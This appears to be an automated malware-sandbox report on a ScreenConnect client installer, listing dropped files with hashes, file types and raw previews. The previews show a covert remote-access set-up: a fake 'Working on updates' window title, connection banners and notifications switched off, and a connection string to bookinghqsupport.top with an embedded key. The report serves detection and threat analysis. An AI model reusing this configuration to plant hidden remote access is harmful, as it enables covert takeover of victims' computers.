                                                                                                                          Preview:...@IXOS.@.....@=.gZ.@.....@.....@.....@.....@.....@......&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}'.ScreenConnect Client (d241e538b9eb3f0a)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (d241e538b9eb3f0a)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{D2F68EAD-292A-9089-63C0-8EAF92A6C63B}&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}.@......&.{BD5627A3-7902-96F8-0A61-8DBE6A166677}&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}.@......&.{0D7A6851-490B-572E-514A-79D15C14EAE4}&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}.@......&.{134E2D94-82C1-F171-24AC-832C505E6215}&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}.@......&.{8A7F623B-496C-5496-9BC5-82C4296F265D}&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}.@......&.{408E9CF8-C237-1BAC-BF92-66E5B5F4F6D9}&.{4B6C036E-28DA-1655-4F4C
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):274
                                                                                                                          Entropy (8bit):4.95901923679848
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:A7FF934654DA515C71CB9A92CF099DE3
                                                                                                                          SHA1:D5B84E84F229F87B339BEAD69B3C3FD72057BFA9
                                                                                                                          SHA-256:379A3D60B9244CD7B2AEF026C673942AAF3AF05BA69E365DBF77FC01898D6998
                                                                                                                          SHA-512:1FBB8260271AA96BCEF788E4FEC4B12C390DED28FD26076A605616B9043509BCF1B9BFFEBDAC9D64C4C8DFDE1076FC8DE7DEAC9D2C7BAC78803D2D87E1EE2DF9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e....../Working on updates Do not turn off your system.
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):256
                                                                                                                          Entropy (8bit):4.87918536836454
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:2C73A3C54403DB59AB05C34470A0F32F
                                                                                                                          SHA1:76046571223DEDEE79FDD449034AD2F28F9D3405
                                                                                                                          SHA-256:7235B66477556F7C7A449CB22F9AEBD85F2770249D133C01228947CCBD6957B9
                                                                                                                          SHA-512:E37DCE2F83626761D36E449CB0E8D9C5611FC8766F842EB724B7D072AF9C9115A81494A947CB8D0ED0E5FF48BA8B0A355F9EB3A707B0820CAD5EBB59A801F360
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#097DCA
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):50133
                                                                                                                          Entropy (8bit):4.759054454534641
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                          SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                          SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                          SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26722
                                                                                                                          Entropy (8bit):7.7401940386372345
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                          SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                          SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                          SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):197120
                                                                                                                          Entropy (8bit):6.586596996537647
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:FF388E261FCB88BB2FB4295B4E84BE66
                                                                                                                          SHA1:622E9B646881E4606A9A82D06E48329CFEBE83AA
                                                                                                                          SHA-256:8872211A8F4FF520D9D3342ED3841EB6FE42F6D83A0F639F6BAF84795DA99DE2
                                                                                                                          SHA-512:8D52B6FB173714F026DF687064A20F42AC7C016FF9E41E941737D3A5159A0027D5ACF420BC03F5BCDE59CDB21586A77E491DF26528B87B550E880CF7AB8A3929
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.^..........." ..0.................. ... ....... .......................`.......P....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):68608
                                                                                                                          Entropy (8bit):6.065078337244406
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:FFEDBAC44FE3AF839D5AE3C759806B2C
                                                                                                                          SHA1:71E48C88DFFFE49C1C155181E760611C65F6CA50
                                                                                                                          SHA-256:42E0ADD27D20E2393F9793197798AC7D374812A6DCD290B153F879A201E546AF
                                                                                                                          SHA-512:533D9284C15C2B0BF4B135FC7E55A04139D83065282FD4AF54866B8B2B6966A0989D4ECF116B89A9B82D028EF446986AA1B92BB07B1521B1AEF15BA286B75358
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............."... ...@....... ..............................|.....@..................................!..O....@.......................`.......!..8............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......po..,.................... ........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....f...s....%.,...(...+*vs....%.}P.........s....(....*....0..&........s....}.....s....}...........}....s.......}R......{R...(#.....}Q.....}.....(....&.(&..........s....o.....(&...~-...%-.&~+.....g...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s:...}....... ..6........s....s:...}.....($..
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):95512
                                                                                                                          Entropy (8bit):6.50433047723113
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:D3E628C507DC331BAB3DE1178088C978
                                                                                                                          SHA1:723D51AF347D333F89A6213714EF6540520A55C9
                                                                                                                          SHA-256:EA1CFAD9596A150BEB04E81F84FA68F1AF8905847503773570C901167BE8BF39
                                                                                                                          SHA-512:4B456466D1B60CDA91A2AAB7CB26BB0A63AAA4879522CB5D00414E54F6D2D8D71668B9E34DFF1575CC5B4C92C61B9989ABBE4B56A3E7869A41EFCC45D23CA966
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................#N....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):549888
                                                                                                                          Entropy (8bit):6.035933098806984
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:665A8C1E8BA78F0953BC87F0521905CC
                                                                                                                          SHA1:FE15E77E0AEF283CED5AFE77B8AECADC27FC86CF
                                                                                                                          SHA-256:8377A87625C04CA5D511CEEC91B8C029F9901079ABF62CF29CF1134C99FA2662
                                                                                                                          SHA-512:0F9257A9C51EB92435ED4D45E2EAAA0E2F12983F6912F6542CC215709AE853364D881F184687610F88332ECA0F47E85FA339ADE6B2D7F0F65ADB5E3236A7B774
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............." ..0..\..........Bv... ........... ....................................@..................................u..O.......t...........................Pu..8............................................ ............... ..H............text...PZ... ...\.................. ..`.rsrc...t............^..............@..@.reloc...............b..............@..B................!v......H........C..41...................t........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):260168
                                                                                                                          Entropy (8bit):6.416438906122177
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                                                          SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                                                          SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                                                          SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):61208
                                                                                                                          Entropy (8bit):6.323262945280686
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:E34E8690E53141EE6914238252FA9988
                                                                                                                          SHA1:B772AEF5386F2D688B249935F13BB430C5088FA9
                                                                                                                          SHA-256:BBE9AE87E2DBA00C5E2F78DC742608862D03F72246669C7FCB01C5646A6DF10B
                                                                                                                          SHA-512:06A64527EB281FE5241A7B43BCCBBA9983F05712ED9719D5720062B88731801EACEC66C0D326E57D93D1E526FB29B432F65D50E500AF7DBF53DC5FDC5145C479
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....|............"...0.............^.... ........@.. ....................... ............@.....................................O....... ................)..........P...8............................................ ............... ..H............text...d.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B................=.......H........S................................................................(....*^.(.......b...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s"...o(...%~....o)...}......(....o*...o+....(,.....A...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):602392
                                                                                                                          Entropy (8bit):6.179559387432912
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:AFA993C978BC52D51E8AF08A02892B4E
                                                                                                                          SHA1:6D92666AE52761AD1E6C5FBB8E1355354516BED7
                                                                                                                          SHA-256:08EFE3E41BD508E2E9C3F8CF4D466CB1C96C35C1B463E79F2A24AC031AB79B48
                                                                                                                          SHA-512:D9D17361CB3C24F640086EFD97F42B15B642917898879710D35B58F8F746B51936518FBDE1F1FB45C1D524BCBEBA74B4CBDE7F32308AF8CC7A8149A6EEDE18F2
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`......2.....@.................................Q...O.... ...................)...@..........8............................................ ............... ..H............text...x.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........I..<...................(.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):266
                                                                                                                          Entropy (8bit):4.842791478883622
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                          SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                          SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                          SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):851968
                                                                                                                          Entropy (8bit):6.24337607810325
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:41B8D757CBC2351FD9C0BF56AEDEDE06
                                                                                                                          SHA1:10B528623A517C71956D0C50C4EBA086988AF615
                                                                                                                          SHA-256:86432F33567EF172674FD7A828AFA6A62E9D90EFC8DBA6199D803B0888D35E1B
                                                                                                                          SHA-512:246F6D3A3CCEE1C33713B564FF36E02A3BC594AD372DEEA9D7FB631F9F4F71FC5E5B0CC7F592B667BA5D731365A2B2992D3A95E434AE50FD58BA25E0D8BE13A7
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................O..............................=.......E....E....Rich..........................PE..d.....\g.........." ...*.f..........0x.......................................P......=.....`.........................................@...t........................x.......(.......6......T.......................(.......@............................................text....e.......f.................. ..`.rdata...............j..............@..@.data...@f.......2..................@....pdata...x.......x...&..............@..@.fptable............................@....reloc...6.......8..................@..B................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):81688
                                                                                                                          Entropy (8bit):5.862062649096442
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:8531526B6F151A08AD8A551611F686D3
                                                                                                                          SHA1:D4A6ABD7256F7624953992ECFE9C6EFBF2529180
                                                                                                                          SHA-256:1BBBE38D4F1193B0AE098BF1BDCE00761EDCD555D0D77F2A33DA6D271FAE4BF0
                                                                                                                          SHA-512:5F5BD79A25ABD20F4E74E128E801C3B852AEDBC4DA0F7A9F8CC72496564010115BC1A098D929597128C757286024B372E2DFFBE5BE6A562F921D70C7F0B81283
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>............."...0..@...........^... ...`....@.. .......................`............@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2073
                                                                                                                          Entropy (8bit):4.716574961948895
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:B5CD4F5F28CEF1887E608D73ABA030DE
                                                                                                                          SHA1:4399F46347DE02EEA2EB4483CBDA12053977E38E
                                                                                                                          SHA-256:39B69AD4AE0B8D8FBF296E9BD7FAF94ACC9168CA776DB3799BC8428B672F945E
                                                                                                                          SHA-512:0E164C6184C54B8ACA57FBFC2C812F30050FF5333F509DD3F2D64E916E94FBAE76720A2695657F1002746B54A1F902B9EC78A995BAAD99451CC5B643AD679136
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="ShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnHide" serializeAs="String">..
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (452), with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):942
                                                                                                                          Entropy (8bit):5.790010894888992
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:366513CCD9491E1C5406ACA91795F396
                                                                                                                          SHA1:E509B2F435ECC293E7AC044E0AE590D1665B664F
                                                                                                                          SHA-256:B863C4A01CAF17DB59265323C7E7D89F7F6D5C1597A9C86C2C8A1B975A14F37C
                                                                                                                          SHA-512:B55EE35F019D254C440E81D156805C14C3B0DE7C222829EB7C2CE87425403BF6B612E3E719D67630EF1A82A09E818D34DAAC8ED2C328B03BFAEC00651EF4BC22
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=bookinghqsupport.top&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQCt6sszjYdR%2fljMO5hPN8Us4uYaE1KfX0EMr5MgD6WzfJDx5V16IAULD7anuBGtX0F3LF1idCdY6kpNAJJAQDV62l1xEtKhzqEJfLAHnrYNkI4IgddX3uDlj%2bQ5ccf18AynIy9sXt2XekatDPx%2bHEawZxuMC46pODU5uafzSkOJ3zhdQfKucobIYw%2f65wL6MiNAHyNGePUbZTnU97ItnoW%2bN22p2gzqZziqkFuuwABhjcLPNBQHLNuuKEC1vR2lxX3EzdRdKmLntP6LMt39dgW8sSIitIZom5OMFnV7U8H8LA819gdb3BqbA%2fSR%2fj57hzMJtK78Yzxu2%2fz9YPP9DzDB</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.8168885163361973
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:38B12EDC3B858C8BA404879A51A3881B
                                                                                                                          SHA1:C1B64CA434B494239B8AEEAD715EA5D339AE84C7
                                                                                                                          SHA-256:EA7256B1606732DCC1DD3B381A1FE7408575173C709390F6A51ECB7A283748E3
                                                                                                                          SHA-512:64C164CF7AB48BD92C7C467A92AE08FCC3333721E59CC0F3BBB669B3BF60DC7661E1A60BE7BF1CDEFF40E479B76C0C7957CD6DF8FB8360E1B4A1633BDA23161D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:..6.........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................d6d6.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16384
                                                                                                                          Entropy (8bit):0.07988155462698229
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:0444C10D97381FEB2A950560C372A1EC
                                                                                                                          SHA1:F284103A907DC03A5AC34D1BF94EBF57D7FF20EA
                                                                                                                          SHA-256:82DC09189D7F9E932AEEF13F75B5677F68155EF2A42693AEFC003C34FDDBDA9D
                                                                                                                          SHA-512:76D98F0A719BA7142EBA893F61A536FD54D90D7F9EBCDECEAD43FB919CC2F31628911209FCA42EF276883F3E49DC916603C73D51EF586A9EF8F48166D2E975C2
                                                                                                                          Malicious:false
